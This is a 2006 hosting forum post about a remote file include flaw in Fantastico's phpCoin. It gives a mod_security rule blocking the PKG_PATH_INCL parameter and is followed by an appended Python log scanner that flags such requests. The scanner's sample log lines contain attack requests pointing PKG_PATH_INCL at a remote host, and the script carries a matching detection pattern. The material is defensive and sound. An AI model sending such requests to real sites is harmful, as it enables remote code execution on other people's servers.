
SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

  1. cmeisinger
    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your mod_security configuration.


    SecFilter "PKG_PATH_INCL"


    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting
    www.wingsix.com


    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file; now I'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
     
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006
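As an added example (not part of the original post or of phpCoin), a small access-log check in the spirit of the mod_security rule above: it scans Apache combined-format log lines for requests carrying a PKG_PATH_INCL query parameter, the thing the rule 403s outright, and additionally flags the ones whose value is a remote URL, which is the remote file include case the post describes. The log lines, the script name example.php and all IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined-format access log line (only the fields we need are captured)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def classify_request(target: str) -> str:
    """Classify one request target as 'clean', 'suspicious' or 'rfi'."""
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)
    if "PKG_PATH_INCL" not in params:
        return "clean"
    # The post's mod_security rule blocks any request carrying this variable;
    # here we also separate a remote URL (the RFI case) from other values.
    for value in params["PKG_PATH_INCL"]:
        if REMOTE_RE.match(unquote(value)):  # unquote again to catch double-encoding
            return "rfi"
    return "suspicious"

def scan_log(lines):
    """Return (ip, target, verdict) for every line whose request is not clean."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line
        verdict = classify_request(m.group("target"))
        if verdict != "clean":
            hits.append((m.group("ip"), m.group("target"), verdict))
    return hits

# Constructed sample log lines; example.php and every address here are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Aug/2006:12:00:01 -0500] "GET /phpcoin/index.php?mod=home HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [26/Aug/2006:12:00:05 -0500] "GET /phpcoin/coin_includes/example.php?PKG_PATH_INCL=http://203.0.113.5/x.txt HTTP/1.0" 200 4096 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [26/Aug/2006:12:00:09 -0500] "GET /phpcoin/coin_includes/example.php?PKG_PATH_INCL=http%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.0" 403 214 "-" "libwww-perl/5.805"',
    '203.0.113.44 - - [26/Aug/2006:12:01:00 -0500] "GET /phpcoin/coin_includes/example.php?PKG_PATH_INCL=somedir/ HTTP/1.1" 403 214 "-" "Mozilla/4.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:10s} {ip:15s} {target}")
```

A 200 status next to an "rfi" verdict is the line worth looking at: it means the request reached the script before any filter was in place.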